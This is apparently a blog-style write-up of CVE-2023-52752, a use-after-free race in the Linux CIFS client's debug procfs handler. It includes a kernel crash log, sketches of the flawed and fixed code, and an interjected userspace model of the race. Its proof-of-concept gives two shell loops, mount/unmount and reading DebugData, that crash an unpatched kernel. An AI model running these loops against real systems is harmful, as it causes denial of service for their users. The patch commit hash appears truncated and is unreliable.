CVE-2023-52752 - Use-After-Free in Linux SMB Client Debug Interface (cifs_debug_data_proc_show)
In late 2023, a use-after-free vulnerability was discovered and patched in the Linux kernel’s SMB (CIFS) client module. This bug, tracked as CVE-2023-52752, could let local users trigger a kernel crash by simply reading debug data from the CIFS client's procfs interface (/proc/fs/cifs/DebugData) while SMB sessions are being mounted or unmounted.
In this post, we’ll break down the cause, exploitability, and fix for CVE-2023-52752, using clear language and examples.
What is the Vulnerability?
The vulnerability lay in the cifs_debug_data_proc_show function, which is responsible for displaying debug data for SMB client sessions on Linux.
During a read from /proc/fs/cifs/DebugData, the function iterated over all SMB sessions in the system but failed to properly skip sessions that were being torn down (i.e., in the process of unmounting). As a result, it could access memory that was already freed, causing a *use-after-free* bug. This usually leads to a kernel panic or crash.
The bug can be triggered by two things happening at the same time:
1. Repeatedly mounting and unmounting an SMB share, and
2. Simultaneously reading from /proc/fs/cifs/DebugData.
If these actions interleave at the right moment, the debug function reads stale memory and the kernel reports a general protection fault (GPF), as shown in the kernel log excerpt below. Note the faulting address: it is built from repeated 0x6b bytes, the value SLUB writes over freed objects when slab poisoning is enabled, so the trace itself shows that a freed session was dereferenced.
    [ 816.251274] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6d81: 0000 [#1] PREEMPT SMP NOPTI
    ...
    [ 816.260138] Call Trace:
    [ 816.260329]  <TASK>
    [ 816.260499]  ? die_addr+0x36/0x90
    [ 816.260762]  ? exc_general_protection+0x1b3/0x410
    [ 816.261126]  ? asm_exc_general_protection+0x26/0x30
    [ 816.261502]  ? cifs_debug_tcon+0xbd/0x240 [cifs]
    [ 816.261878]  ? cifs_debug_tcon+0xab/0x240 [cifs]
    [ 816.262249]  cifs_debug_data_proc_show+0x516/0xdb0 [cifs]
    [ 816.262689]  ? seq_read_iter+0x379/0x470
    [ 816.262995]  seq_read_iter+0x118/0x470
    [ 816.263291]  proc_reg_read_iter+0x53/0x90
    [ 816.263596]  ? srso_alias_return_thunk+0x5/0x7f
    [ 816.263945]  vfs_read+0x201/0x350
    [ 816.264211]  ksys_read+0x75/0x100
    [ 816.264472]  do_syscall_64+0x3f/0x90
    [ 816.264750]  entry_SYSCALL_64_after_hwframe+0x6e/0xd8
    [ 816.265135] RIP: 0033:0x7fd5e669d381
Here’s a simple sketch (not verbatim) of the old flawed logic in cifs_debug_data_proc_show:
    list_for_each_entry(ses, &tcon->ses_list, sibling) {
        /* ses might be exiting and already freed elsewhere */
        seq_printf(m, "SMB session: %p\n", ses);
    }
If a CIFS session (ses) is being torn down (status SES_EXITING), it could get freed by another thread *while this debug function is still running*. The pointer ses is now dangling, but the code still tries to use it.
The Linux kernel patch for CVE-2023-52752 simply skips sessions that are being torn down:
    list_for_each_entry(ses, &tcon->ses_list, sibling) {
        if (ses->ses_status == SES_EXITING)
            continue; /* skip sessions that are exiting */
        seq_printf(m, "SMB session: %p\n", ses);
    }
This makes sure the debug code never tries to access memory that’s been released.
You can see the official patch here.
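To make the race visible without a kernel, here is an added userspace model (my own code, not from the post or the kernel): the unmount is split into a "marked exiting" phase and a "freed" phase, freeing is modelled by writing SLUB's 0x6b poison byte over the object instead of calling free(), and a callback stands in for the unmount thread running between the status check and the use of the entry. Session, field and address values are constructed for the demonstration.

```c
#include <stdint.h>
#include <string.h>

/* Session states named after the post's sketch; the values are made up for this model. */
enum { SES_GOOD = 0, SES_EXITING = 1 };
#define POISON_FREE 0x6b   /* byte SLUB writes over freed objects when slab poisoning is on */

struct ses {
    int status;
    uint64_t server_addr;   /* stands in for a pointer the debug printer follows */
    struct ses *next;
};

/* Teardown, phase 2: the kernel would kfree() the session here. Poisoning instead of
 * freeing keeps the later read defined so the stale value can be observed. */
static void teardown_if_exiting(struct ses *s)
{
    if (s->status == SES_EXITING)
        memset(s, POISON_FREE, sizeof *s);
}

/* Walks the list like the debug handler. 'preempt' models the unmount thread running
 * after an entry is picked but before it is used. Returns the last value read. */
static uint64_t debug_walk(struct ses *head, int skip_exiting, void (*preempt)(struct ses *))
{
    uint64_t last = 0;
    for (struct ses *s = head, *next; s; s = next) {
        next = s->next;                       /* saved before s can be poisoned */
        if (skip_exiting && s->status == SES_EXITING)
            continue;                         /* the fix (the kernel checks this under ses->ses_lock) */
        if (preempt)
            preempt(s);                       /* unmount thread gets to run here */
        last = s->server_addr;                /* stale read if s was freed meanwhile */
    }
    return last;
}

/* Constructed scenario: two sessions, the second one in the middle of an unmount. */
static struct ses g_ses1, g_ses2;

static uint64_t run_scenario(int fixed)
{
    g_ses2 = (struct ses){ SES_GOOD, 0xc0de000000000002ULL, NULL };
    g_ses1 = (struct ses){ SES_GOOD, 0xc0de000000000001ULL, &g_ses2 };
    g_ses2.status = SES_EXITING;              /* teardown, phase 1: still on the list */
    return debug_walk(&g_ses1, fixed, teardown_if_exiting);
}
```

run_scenario(0), the unpatched walk, returns 0x6b6b6b6b6b6b6b6b, the same all-0x6b poison pattern as the faulting address in the log above; run_scenario(1), with the status check in place, returns the live session's value and never touches the exiting one.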
Proof-of-Concept (PoC) Exploit
Here’s a simple way to trigger the bug (on a vulnerable kernel) and crash the system. Do not run this on production hardware!
    #!/bin/bash
    # Mount and unmount an SMB share in a loop
    while true; do
        mount -t cifs //server/share /mnt -o guest
        sleep 0.2
        umount /mnt
    done
At the same time, in another terminal:
    # Read the debug data in a loop
    while true; do
        cat /proc/fs/cifs/DebugData >/dev/null
    done
After a short time, if unlucky, this may trigger a kernel bug (panic or GPF).
References & Further Reading
- Official patch: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=c3a7fb38716451e4a7adfeaa8e80f308937d612
- Red Hat Advisory: https://access.redhat.com/security/cve/cve-2023-52752
- CVE Description at NVD
- Linux Kernel CIFS Code
Conclusion
CVE-2023-52752 is a classic example of a race condition in kernel debug code, resulting in a use-after-free scenario. Any user on a system could easily crash the machine. The fix is simple but critical.
If you are running a Linux kernel where this patch is not present, upgrading immediately is highly recommended, especially on multi-user systems or where SMB shares are in use.
Timeline
Published on: 05/21/2024 16:15:14 UTC
Last modified on: 08/02/2024 23:11:35 UTC